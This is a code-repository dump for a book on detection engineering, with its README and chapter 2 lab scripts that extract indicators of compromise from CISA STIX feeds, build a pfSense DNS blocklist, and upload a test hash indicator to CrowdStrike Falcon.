├── LICENSE
├── README.md
├── chapter-01
└── CH01-Diagrams.pdf
├── chapter-02
├── lab-2.1
│ ├── cisa-stix2json-ioc-extract.py
│ ├── lab-2.1-initialoutput.png
│ ├── requirements.txt
│ ├── snatchransomware.json
│ └── svrjetbrains.json
├── lab-2.2
│ ├── c2_domain_feed.txt
│ ├── cisa-stix2json-ioc-extract.py
│ ├── cisa_domain_dnsbl.txt
│ ├── pfsense-custom-cisa-feed.py
│ ├── pfsense-dnsrbl-serve.py
│ ├── pfsense-pfblockerNG-DNSBL-config.png
│ ├── python-browser-access-text-file.png
│ ├── python-flash-runnning-terminal.png
│ ├── python-flask-windows-module-requirement.png
│ └── requirements.txt
├── lab-2.3
│ └── SHA-HASH-FEED.txt
├── lab-2.4
│ ├── custom-ioc-crowdstrike.py
│ └── requirements.txt
└── lab-2.5
│ ├── ag_ioc_sha256_hash_vt_basic.yar.yml
│ └── rule_multiple_connections_ru_cti.yar.yml
├── chapter-03
├── lab-3.2
│ ├── custom-ioa-cs.py
│ ├── get-ioa-cs.py
│ ├── requirements.txt
│ └── test-rule-import.json
├── lab-3.3
│ ├── local-tf-repo
│ │ ├── LICENSE
│ │ ├── README.md
│ │ └── main.tf
│ └── wiz-threat-rule-example.tf
├── lab-3.4
│ ├── aws-iam-cloud-custodian-deploy-lambda-policy.json
│ ├── aws-iam-cloud-custodian-s3-lambdas-policy.json
│ ├── cfn-configure-aws-credentials-latest.yml
│ ├── custodian-s3-policy.yml
│ ├── deploy-to-aws-cloud-custodian.yml
│ ├── oidc-trust-aws.json
│ └── sample-policy.yml
├── lab-3.5
│ ├── aws-lambda-sample-rce-payload.json
│ ├── example-custom-rasp-rule.json
│ ├── insecure_lamda_example.py
│ ├── requirements.txt
│ ├── trend-rasp-custom-rule-ci.py
│ ├── trend_cloudone_appsec_api_swagger.json
│ └── trendmicro-cloud-one-rasp.yml
└── lab-3.6
│ ├── github-action-terraform-s3backed.yml
│ ├── iam-policy-github-tfstate-s3.json
│ ├── main.tf
│ └── rule-Log4j_Scanner_detected_in_user_agent_or_referrer.json
├── chapter-04
├── lab-4.1
│ └── poe-bot-prompt-context.txt
└── lab-4.3
│ ├── ai-recommended-spl.txt
│ ├── de-feed-url-grab.py
│ ├── de-poe-bot-spl-example-outputs.txt
│ ├── de-poe-bot-spl.py
│ ├── de-rssparse-generate-spl-example-output.txt
│ ├── de-rssparse-generate-spl.py
│ └── requirements.txt
├── chapter-05
├── lab-5.1
│ ├── cs-falcon-us-2-swagger-beautified.json
│ ├── cs-falcon-us-2-swagger-openapi-spec.json
│ ├── custom-ioa-cs.py
│ ├── get-ioa-cs.py
│ ├── github-action-deploy-customioa.yml
│ ├── helloWorld-sysargv-example.py
│ ├── linter-custom-ioa.py
│ ├── requirements.txt
│ └── test-rule-import.json
├── lab-5.2
│ ├── WannaCry Malware Profile _ Mandiant.pdf
│ ├── chron-yara-rule-payload-check.py
│ ├── chron-yara-rule-testspec-ci.py
│ ├── chron-yara-unittest.yml
│ ├── requirements.txt
│ ├── tests
│ │ ├── chron-yara-rule-testspec-ci.py
│ │ └── testspec.txt
│ └── wannacry_killswitch_domain.yaral
├── lab-5.3
│ ├── rules
│ │ └── ms08-067-snort.rule
│ └── snort2panos-test.py
├── lab-5.4
│ ├── bash-testing
│ │ ├── test-suricata-unittest-rules.sh
│ │ └── test2-suricata-unittest-rules.sh
│ ├── buildspec.csv
│ ├── emerging-exploit.rules
│ ├── rules
│ │ └── test-exploit-zerologon.rules
│ ├── suricata-config.yml
│ ├── suricata-rule-test-ci.py
│ ├── suricata-unit-test-ci.yml
│ └── tests
│ │ ├── Exfiltration-DNS-CreditCard-903.pcap
│ │ ├── Exfiltration-DNS-Sourcecode-903.pcap
│ │ ├── Infiltration-CVE-2016-4117-1329.pcap
│ │ ├── Lateral-Movement-CVE-2023-21716-exploit.pcap
│ │ ├── Lateral-Movement-Sabbath-ransomware.pcap
│ │ └── cve-2020-1472-exploit.pcap
└── lab-5.5
│ ├── bad-code.sh
│ ├── instructions.txt
│ └── pre-commit
├── chapter-06
├── lab-6.1
│ ├── audit-example-log.txt
│ ├── buildspec.txt
│ ├── spl-integration-test.sh
│ ├── spl-test-exp-backoff.sh
│ ├── splunk cli cmds.txt
│ ├── splunk debian download.txt
│ ├── splunk-first-start-shell-session.txt
│ ├── splunk-spl-int-test.yml
│ ├── start-github-action-runner.sh
│ └── tests
│ │ └── audit-example-log.txt
├── lab-6.2
│ ├── cloudwatch-metrics-cli-query.txt
│ ├── createAccessKeyPolicyCI.json
│ ├── iam-access-key-generated-rule-CloudFormation-Template.yaml
│ ├── main.tf
│ ├── requirements.txt
│ └── tests
│ │ ├── github-action-eventbridge-integration-testing.yml
│ │ ├── test-iam-access-key-generated-rule.py
│ │ ├── testing.py
│ │ └── validate-iam-access-key-generated-rule.py
├── lab-6.3
│ ├── BASE-get-detections-host-cs copy.py
│ ├── Cloud IP Addresses and FQDNs _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
│ ├── Deploy Falcon Sensor for Linux Using CLI _ Deploy Falcon Sensor for Linux _ Falcon Sensor for Linux _ Linux, Kubernetes, and Cloud _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
│ ├── Sensor Update Policies _ Sensor Deployment and Maintenance _ Documentation _ Support and resources _ Falcon.pdf
│ ├── cs-falcon-us-2-swagger-beautified.json
│ ├── cs-falcon-us-2-swagger-openapi-spec.json
│ ├── custom-ioa-cs.py
│ ├── detections-example-output-build-ci.txt
│ ├── example-detections-found-output.json
│ ├── falcon-detection-testing.yml
│ ├── get-ioa-cs.py
│ ├── linter-custom-ioa.py
│ ├── requirements.txt
│ ├── test-detections-host-cs.py
│ └── test-rule-import.json
├── lab-6.4
│ └── start-caledera.sh
└── optional-resources
│ └── bas-tools
│ └── safebreach-get-test-results.py
├── chapter-07
├── lab-7.1
│ ├── ai-unit-testing-prompt-claude2.txt
│ ├── bot-kb
│ │ └── links-to-pdfs.md
│ ├── buildspec.csv
│ ├── ci-spl-tester-poe.py
│ ├── detections
│ │ └── aws-iam-access-key-creation.spl
│ ├── local-spl-tester-poe.py
│ ├── logs
│ │ └── aws-iam-access-key-creation.log
│ ├── prompt.md
│ ├── requirements.txt
│ └── splunk-spl-ai-tester-ci.yml
└── lab-7.2
│ └── linter-custom-ioa.py
├── chapter-08
├── lab-8.1
│ ├── Data Ingestion and Health 2024-01-25T1419.pdf
│ ├── Rule Detections 2024-01-25T1416.pdf
│ └── Rule Detections.yaml
└── lab-8.2
│ ├── chronicle-alerts.json
│ ├── chronicle-listrules.json
│ └── tines-count-google-chronicle-alerts-and-disable-noisy-rules.json
├── chapter-09
├── lab-9.1
│ └── atlassian_jql-cheat-sheet.pdf
└── references
│ └── Beyond-the-basics-of-scaling-agile-white-paper.pdf
└── chapter-10
├── diagrams
├── L1-WorkflowPattern.png
├── L2-WorkflowPattern.png
└── L3-WorkfowPattern.png
└── lab-10.1
└── splunk_spl_dev.ipynb
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 Packt
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Automating Security Detection Engineering
2 |
3 |
4 |
5 | This is the code repository for [Automating Security Detection Engineering](https://www.packtpub.com/product/automating-security-detection-engineering/9781837636419?utm_source=github&utm_medium=repository&utm_campaign=9781837636419), published by Packt.
6 |
7 | **A hands-on guide to implementing Detection as Code**
8 |
9 | ## What is this book about?
10 | This book focuses entirely on the automation of detection engineering with practice labs, and technical guidance that optimizes and scales detection focused programs. Using this book as a bootstrap, practitioners can mature their program and free up valuable engineering time.
11 |
12 | This book covers the following exciting features:
13 | * Understand the architecture of Detection as Code implementations
14 | * Develop custom test functions using Python and Terraform
15 | * Leverage common tools like GitHub and Python 3.x to create detection-focused CI/CD pipelines
16 | * Integrate cutting-edge technology and operational patterns to further refine program efficacy
17 | * Apply monitoring techniques to continuously assess use case health
18 | * Create, structure, and commit detections to a code repository
19 |
20 | If you feel this book is for you, get your [copy](https://www.amazon.com/dp/1837636419) today!
21 |
22 |
24 |
25 | ## Instructions and Navigations
26 | All of the code is organized into folders. For example, Chapter02.
27 |
28 | The code will look like the following:
29 | ```
30 | if {
31 | event1 == True,
32 | {
33 | event2 == True,
34 | {
35 | event3
36 | }
37 | }
38 | }
39 | ```
40 |
41 | **Following is what you need for this book:**
42 | This book is for security engineers and analysts responsible for the day-to-day tasks of developing and implementing new detections at scale. If you’re working with existing programs focused on threat detection, you’ll also find this book helpful. Prior knowledge of DevSecOps, hands-on experience with any programming or scripting languages, and familiarity with common security practices and tools are recommended for an optimal learning experience.
43 |
44 | With the following software and hardware list you can run all code files present in the book (Chapter 1-10).
45 | ### Software and Hardware List
46 | | Chapter | Software required | OS required |
47 | | -------- | ------------------------------------ | ----------------------------------- |
48 | | 1-10 | A computer capable of running an Ubuntu-based VM concurrently, with a recommended 8 CPU cores and 16 GB of memory for the host machine| Windows, Mac OS X, and Linux (Any) |
49 | | 1-10 | Amazon Web Services (AWS) | Windows, Mac OS X, and Linux (Any) |
50 | | 1-10 | Atlassian Jira Cloud | Windows, Mac OS X, and Linux (Any) |
51 | | 1-10 | Cloud Custodian | Windows, Mac OS X, and Linux (Any) |
52 | | 1-10 | Cloudfl are WAF | Windows, Mac OS X, and Linux (Any) |
53 | | 1-10 | CodeRabbit AI | Windows, Mac OS X, and Linux (Any) |
54 | | 1-10 | CrowdStrike Falcon EDR | Windows, Mac OS X, and Linux (Any) |
55 | | 1-10 | Datadog Cloud SIEM | Windows, Mac OS X, and Linux (Any) |
56 | | 1-10 | Git CLI | Windows, Mac OS X, and Linux (Any) |
57 | | 1-10 | GitHub | Windows, Mac OS X, and Linux (Any) |
58 | | 1-10 | Google Chronicle | Windows, Mac OS X, and Linux (Any) |
59 | | 1-10 | Google Colab | Windows, Mac OS X, and Linux (Any) |
60 | | 1-10 | Hashicorp Terraform | Windows, Mac OS X, and Linux (Any) |
61 | | 1-10 | Microsoft VS Code | Windows, Mac OS X, and Linux (Any) |
62 | | 1-10 | PFSense Community Edition | Windows, Mac OS X, and Linux (Any) |
63 | | 1-10 | Poe.com AI | Windows, Mac OS X, and Linux (Any) |
64 | | 1-10 | Python 3.9+ | Windows, Mac OS X, and Linux (Any) |
65 | | 1-10 | SOC Prime Uncoder AI | Windows, Mac OS X, and Linux (Any) |
66 | | 1-10 | Splunk Enterprise | Windows, Mac OS X, and Linux (Any) |
67 | | 1-10 | Tines.com Cloud SOAR | Windows, Mac OS X, and Linux (Any) |
68 | | 1-10 | Trend Micro Cloud One | Windows, Mac OS X, and Linux (Any) |
69 | | 1-10 | Ubuntu Desktop LTS 22.04+ | Windows, Mac OS X, and Linux (Any) |
70 | | 1-10 | Wazuh Server and EDR | Windows, Mac OS X, and Linux (Any) |
71 |
72 | ### Related products
73 | * Security Monitoring with Wazuh [[Packt]](https://www.packtpub.com/product/security-monitoring-with-wazuh/9781837632152?utm_source=github&utm_medium=repository&utm_campaign=9781837632152) [[Amazon]](https://www.amazon.com/dp/1837632154)
74 |
75 | * Practical Threat Detection Engineering [[Packt]](https://www.packtpub.com/product/practical-threat-detection-engineering/9781801076715?utm_source=github&utm_medium=repository&utm_campaign=9781801076715) [[Amazon]](https://www.amazon.com/dp/1801076715)
76 |
77 |
78 | ## Get to Know the Author
79 | **Dennis Chow**
80 | is an experienced security engineer and manager who has led global security teams in multiple Fortune 500 industries. Dennis started from a IT and security analyst background working his way up to engineering, architecture, and consultancy in blue and red team focused roles. Dennis is also a former AWS professional services consultant that focused on transforming security operations for clients.
81 |
82 |
--------------------------------------------------------------------------------
/chapter-01/CH01-Diagrams.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-01/CH01-Diagrams.pdf
--------------------------------------------------------------------------------
/chapter-02/lab-2.1/cisa-stix2json-ioc-extract.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, json, re, argparse
3 |
4 |
5 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-09/AA23-263A%20%23StopRansomware%20Snatch%20Ransomware.stix_.json")
6 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json")
7 |
8 | #print(type(cisa_feed.json()))
9 | #json_payload = cisa_feed.json()
10 |
11 | def ioc_extract(url_arg):
12 | cisa_feed = requests.get(url_arg)
13 | json_payload = cisa_feed.json()
14 |
15 | filename_list = []
16 | domain_list = []
17 | email_list = []
18 | ipv4_list = []
19 | md5_list = []
20 | sha256_list = []
21 | url_list = []
22 |
23 | for obj in json_payload["objects"]:
24 | if obj["type"] == "indicator":
25 | try:
26 | pattern = obj["pattern"]
27 | if 'email-message:' in pattern:
28 | email_match = re.search("\.value = '(\S{1,100}@\S{1,100}\.\S{1,6})']", pattern)
29 | if email_match:
30 | email = email_match.group(1)
31 | email = str(email).strip("'").strip(']').strip("'")
32 | #print(email)
33 | email_list.append(email)
34 | if "file:name" in pattern:
35 | filename_match = re.search("file:name = '(\S{1,20})'", pattern)
36 | if filename_match:
37 | filename = filename_match.group(1)
38 | #print(filename)
39 | filename_list.append(filename)
40 | if "SHA-256" in pattern:
41 | sha256_match = re.search("'SHA-256' = '([A-Fa-f0-9]{64})'", pattern)
42 | if sha256_match:
43 | sha256 = sha256_match.group(1)
44 | #print(sha256)
45 | sha256_list.append(sha256)
46 | if "MD5" in pattern:
47 | md5_match = re.search("MD5 = '([A-Fa-f0-9]{32})'", pattern)
48 | if md5_match:
49 | md5 = md5_match.group(1)
50 | #print(md5)
51 | md5_list.append(md5)
52 | if "domain-name" in pattern:
53 | domain_match = re.search("value = '(\S{3,255})'", pattern)
54 | if domain_match:
55 | domain = domain_match.group(1)
56 | #print(domain)
57 | domain_list.append(domain)
58 | if "ipv4-addr" in pattern:
59 | ipv4_match = re.search("value = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'", pattern)
60 | if ipv4_match:
61 | ipv4 = ipv4_match.group(1)
62 | #print(ipv4)
63 | ipv4_list.append(ipv4)
64 | if "url:value" in pattern:
65 | url_match = re.search("value = '(\S{6,500})'", pattern)
66 | if url_match:
67 | url = url_match.group(1)
68 | #print(url)
69 | url_list.append(url)
70 | except KeyError:
71 | pass
72 | # standard out #
73 | print('### FQDN PARSED ###')
74 | print(domain_list)
75 | print('### EMAILS PARSED ###')
76 | print(email_list)
77 | print('### FILENAMES PARSED ###')
78 | print(filename_list)
79 | print('### IPv4 PARSED ###')
80 | print(ipv4_list)
81 | print('### SHA256 PARSED ###')
82 | print(sha256_list)
83 | print('### MD5 PARSED ###')
84 | print(md5_list)
85 | print('### URL PARSED ###')
86 | print(url_list)
87 |
88 | ### Dunder statement main driver ###
89 | if __name__ == '__main__':
90 | parser = argparse.ArgumentParser(
91 | prog='cisa-stix2json-ioc-extract',
92 | description='Takes CISA STIX2 JSON formatted feeds and parses IOCs',
93 | epilog='Usage: python3 cisa-stix2json-ioc-extract.py -url "https://cisa.gov/foo/something.json"'
94 | )
95 | parser.add_argument('-url', type=str, help='use stix2json formatted url')
96 | args = parser.parse_args()
97 | #url_arg = args.url
98 | #call ioc extractor func
99 | ioc_extract(args.url)
100 | exit()
--------------------------------------------------------------------------------
/chapter-02/lab-2.1/lab-2.1-initialoutput.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.1/lab-2.1-initialoutput.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.1/requirements.txt:
--------------------------------------------------------------------------------
1 | altgraph @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/altgraph-0.17.2-py2.py3-none-any.whl
2 | certifi==2023.11.17
3 | charset-normalizer==3.3.2
4 | crowdstrike-falconpy==1.3.4
5 | future @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/future-0.18.2-py3-none-any.whl
6 | idna==3.6
7 | macholib @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/macholib-1.15.2-py2.py3-none-any.whl
8 | requests==2.31.0
9 | six @ file:///AppleInternal/Library/BuildRoots/9dd5efe2-7fad-11ee-b588-aa530c46a9ea/Library/Caches/com.apple.xbs/Sources/python3/six-1.15.0-py2.py3-none-any.whl
10 | urllib3==2.1.0
11 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/cisa-stix2json-ioc-extract.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, json, re, argparse
3 |
4 |
5 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-09/AA23-263A%20%23StopRansomware%20Snatch%20Ransomware.stix_.json")
6 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json")
7 |
8 | #print(type(cisa_feed.json()))
9 | #json_payload = cisa_feed.json()
10 |
11 | def ioc_extract(url_arg):
12 | cisa_feed = requests.get(url_arg)
13 | json_payload = cisa_feed.json()
14 |
15 | filename_list = []
16 | domain_list = []
17 | email_list = []
18 | ipv4_list = []
19 | md5_list = []
20 | sha256_list = []
21 | url_list = []
22 |
23 | for obj in json_payload["objects"]:
24 | if obj["type"] == "indicator":
25 | try:
26 | pattern = obj["pattern"]
27 | if 'email-message:' in pattern:
28 | email_match = re.search("\.value = '(\S{1,100}@\S{1,100}\.\S{1,6})']", pattern)
29 | if email_match:
30 | email = email_match.group(1)
31 | email = str(email).strip("'").strip(']').strip("'")
32 | #print(email)
33 | email_list.append(email)
34 | if "file:name" in pattern:
35 | filename_match = re.search("file:name = '(\S{1,20})'", pattern)
36 | if filename_match:
37 | filename = filename_match.group(1)
38 | #print(filename)
39 | filename_list.append(filename)
40 | if "SHA-256" in pattern:
41 | sha256_match = re.search("'SHA-256' = '([A-Fa-f0-9]{64})'", pattern)
42 | if sha256_match:
43 | sha256 = sha256_match.group(1)
44 | #print(sha256)
45 | sha256_list.append(sha256)
46 | if "MD5" in pattern:
47 | md5_match = re.search("MD5 = '([A-Fa-f0-9]{32})'", pattern)
48 | if md5_match:
49 | md5 = md5_match.group(1)
50 | #print(md5)
51 | md5_list.append(md5)
52 | if "domain-name" in pattern:
53 | domain_match = re.search("value = '(\S{3,255})'", pattern)
54 | if domain_match:
55 | domain = domain_match.group(1)
56 | #print(domain)
57 | domain_list.append(domain)
58 | if "ipv4-addr" in pattern:
59 | ipv4_match = re.search("value = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'", pattern)
60 | if ipv4_match:
61 | ipv4 = ipv4_match.group(1)
62 | #print(ipv4)
63 | ipv4_list.append(ipv4)
64 | if "url:value" in pattern:
65 | url_match = re.search("value = '(\S{6,500})'", pattern)
66 | if url_match:
67 | url = url_match.group(1)
68 | #print(url)
69 | url_list.append(url)
70 | except KeyError:
71 | pass
72 | # standard out #
73 | print('### FQDN PARSED ###')
74 | print(domain_list)
75 | print('### EMAILS PARSED ###')
76 | print(email_list)
77 | print('### FILENAMES PARSED ###')
78 | print(filename_list)
79 | print('### IPv4 PARSED ###')
80 | print(ipv4_list)
81 | print('### SHA256 PARSED ###')
82 | print(sha256_list)
83 | print('### MD5 PARSED ###')
84 | print(md5_list)
85 | print('### URL PARSED ###')
86 | print(url_list)
87 |
88 | ### Dunder statement main driver ###
89 | if __name__ == '__main__':
90 | parser = argparse.ArgumentParser(
91 | prog='cisa-stix2json-ioc-extract',
92 | description='Takes CISA STIX2 JSON formatted feeds and parses IOCs',
93 | epilog='Usage: python3 cisa-stix2json-ioc-extract.py -url "https://cisa.gov/foo/something.json"'
94 | )
95 | parser.add_argument('-url', type=str, help='use stix2json formatted url')
96 | args = parser.parse_args()
97 | #url_arg = args.url
98 | #call ioc extractor func
99 | ioc_extract(args.url)
100 | exit()
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/cisa_domain_dnsbl.txt:
--------------------------------------------------------------------------------
1 | matclick.com
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/pfsense-custom-cisa-feed.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, json, re, argparse
3 |
4 |
5 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-09/AA23-263A%20%23StopRansomware%20Snatch%20Ransomware.stix_.json")
6 | #cisa_feed = requests.get("https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json")
7 |
8 | #print(type(cisa_feed.json()))
9 | #json_payload = cisa_feed.json()
10 |
11 | def ioc_extract(url_arg):
12 | cisa_feed = requests.get(url_arg)
13 | json_payload = cisa_feed.json()
14 |
15 | filename_list = []
16 | domain_list = []
17 | email_list = []
18 | ipv4_list = []
19 | md5_list = []
20 | sha256_list = []
21 | url_list = []
22 |
23 | for obj in json_payload["objects"]:
24 | if obj["type"] == "indicator":
25 | try:
26 | pattern = obj["pattern"]
27 | if 'email-message:' in pattern:
28 | email_match = re.search("\.value = '(\S{1,100}@\S{1,100}\.\S{1,6})']", pattern)
29 | if email_match:
30 | email = email_match.group(1)
31 | email = str(email).strip("'").strip(']').strip("'")
32 | #print(email)
33 | email_list.append(email)
34 | if "file:name" in pattern:
35 | filename_match = re.search("file:name = '(\S{1,20})'", pattern)
36 | if filename_match:
37 | filename = filename_match.group(1)
38 | #print(filename)
39 | filename_list.append(filename)
40 | if "SHA-256" in pattern:
41 | sha256_match = re.search("'SHA-256' = '([A-Fa-f0-9]{64})'", pattern)
42 | if sha256_match:
43 | sha256 = sha256_match.group(1)
44 | #print(sha256)
45 | sha256_list.append(sha256)
46 | if "MD5" in pattern:
47 | md5_match = re.search("MD5 = '([A-Fa-f0-9]{32})'", pattern)
48 | if md5_match:
49 | md5 = md5_match.group(1)
50 | #print(md5)
51 | md5_list.append(md5)
52 | if "domain-name" in pattern:
53 | domain_match = re.search("value = '(\S{3,255})'", pattern)
54 | if domain_match:
55 | domain = domain_match.group(1)
56 | #print(domain)
57 | domain_list.append(domain)
58 | if "ipv4-addr" in pattern:
59 | ipv4_match = re.search("value = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'", pattern)
60 | if ipv4_match:
61 | ipv4 = ipv4_match.group(1)
62 | #print(ipv4)
63 | ipv4_list.append(ipv4)
64 | if "url:value" in pattern:
65 | url_match = re.search("value = '(\S{6,500})'", pattern)
66 | if url_match:
67 | url = url_match.group(1)
68 | #print(url)
69 | url_list.append(url)
70 | except KeyError:
71 | pass
72 | '''
73 | # standard out #
74 | print('### FQDN PARSED ###')
75 | print(domain_list)
76 | print('### EMAILS PARSED ###')
77 | print(email_list)
78 | print('### FILENAMES PARSED ###')
79 | print(filename_list)
80 | print('### IPv4 PARSED ###')
81 | print(ipv4_list)
82 | print('### SHA256 PARSED ###')
83 | print(sha256_list)
84 | print('### MD5 PARSED ###')
85 | print(md5_list)
86 | print('### URL PARSED ###')
87 | print(url_list)
88 | '''
89 | return domain_list, email_list, filename_list, ipv4_list, sha256_list, url_list
90 |
91 | ### Dunder statement main driver ###
92 | if __name__ == '__main__':
93 | parser = argparse.ArgumentParser(
94 | prog='cisa-stix2json-ioc-extract',
95 | description='Takes CISA STIX2 JSON formatted feeds and parses IOCs',
96 | epilog='Usage: python3 cisa-stix2json-ioc-extract.py -url "https://cisa.gov/foo/something.json"'
97 | )
98 | parser.add_argument('-url', type=str, help='use stix2json formatted url')
99 | args = parser.parse_args()
100 |
101 | #positional tuple grab domains_list from return
102 | domains = ioc_extract(args.url)[0]
103 |
104 | #write buffer to file
105 | file_handle = open('cisa_domain_dnsbl.txt', 'a')
106 | for i in domains:
107 | file_handle.write(i)
108 | file_handle.close()
109 |
110 | exit()
111 |
112 |
113 | '''
114 | python .\pfsense-custom-cisa-feed.py -url "https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.json"
115 | '''
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/pfsense-dnsrbl-serve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from flask import Flask, Response
3 | app = Flask(__name__)
4 |
5 | @app.route("/")
6 | def servefile():
7 | handle = open('cisa_domain_dnsbl.txt', 'r')
8 | file = handle.read()
9 | return Response(file, mimetype="text/plain")
10 |
11 | if __name__ == "__main__":
12 | app.run(host='0.0.0.0', port=443, ssl_context='adhoc')
13 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/pfsense-pfblockerNG-DNSBL-config.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/pfsense-pfblockerNG-DNSBL-config.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/python-browser-access-text-file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/python-browser-access-text-file.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/python-flash-runnning-terminal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/python-flash-runnning-terminal.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/python-flask-windows-module-requirement.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-02/lab-2.2/python-flask-windows-module-requirement.png
--------------------------------------------------------------------------------
/chapter-02/lab-2.2/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | idna==3.6
4 | requests==2.31.0
5 | urllib3==2.1.0
6 |
--------------------------------------------------------------------------------
/chapter-02/lab-2.4/custom-ioc-crowdstrike.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | from falconpy import APIHarnessV2
3 | import argparse
4 |
5 | #Ref: https://www.falconpy.io/Usage/Basic-Uber-Class-usage.html#import-and-authentication
6 |
7 | #In a CI runner make these from the env variables at build time from a secrets manager!
8 | #CLIENT_ID=''
9 | #CLIENT_SECRET=''
10 |
11 | def uploadioc(ioc_body, id, secret):
12 | #assign arguments to variables
13 | BODY = ioc_body
14 | CLIENT_ID = id
15 | CLIENT_SECRET = secret
16 |
17 | #client setup
18 | falcon = APIHarnessV2(client_id=CLIENT_ID,
19 | client_secret=CLIENT_SECRET
20 | )
21 | response = falcon.command("indicator_create_v1",
22 | retrodetects=False,
23 | ignore_warnings=True,
24 | body=BODY
25 | )
26 | #print(response)
27 | return response
28 |
29 | if __name__ == '__main__':
30 | parser = argparse.ArgumentParser(
31 | prog='custom-ioc-crowdstrike',
32 | description='Takes JSON formatted payload for a custom IOC',
33 | epilog='Usage: python3 custom-ioc-crowdstrike.py -id "" -secret ""'
34 | )
35 | parser.add_argument('-id', type=str, help='Crowdstrike Falcon API CLIENT_ID')
36 | parser.add_argument('-secret', type=str, help='Crowdstrike Falcon API CLIENT_SECRET')
37 | args = parser.parse_args()
38 |
39 | #construct the IOC body required example SHA256
40 | #in the real world you would pull this from a folder or file in the CI runner in a loop
41 | BODY = {
42 | "comment": "this is a test if falconpy sdk",
43 | "indicators": [
44 | {
45 | "action": "detect",
46 | "applied_globally": True,
47 | "description": "testing custom iocs in sdk",
48 | "expiration": "2024-10-22T10:40:39.372Z",
49 | #"host_groups": host_group_list,
50 | #"metadata": {
51 | # "filename": "string"
52 | #},
53 | #"mobile_action": "string",
54 | "platforms": ['windows', 'linux'],
55 | "severity": "low",
56 | #"source": "string",
57 | "tags": ['falconpytest', 'test-cti'],
58 | "type": "sha256",
59 | "value": "8b8cdeb0540ebe562747fd7c618ed07eb1fbc5e98ed3b372672e045bae203925"
60 | }
61 | ]
62 | }
63 | #define arguments to variables for main
64 | api_id = args.id
65 | api_secret = args.secret
66 |
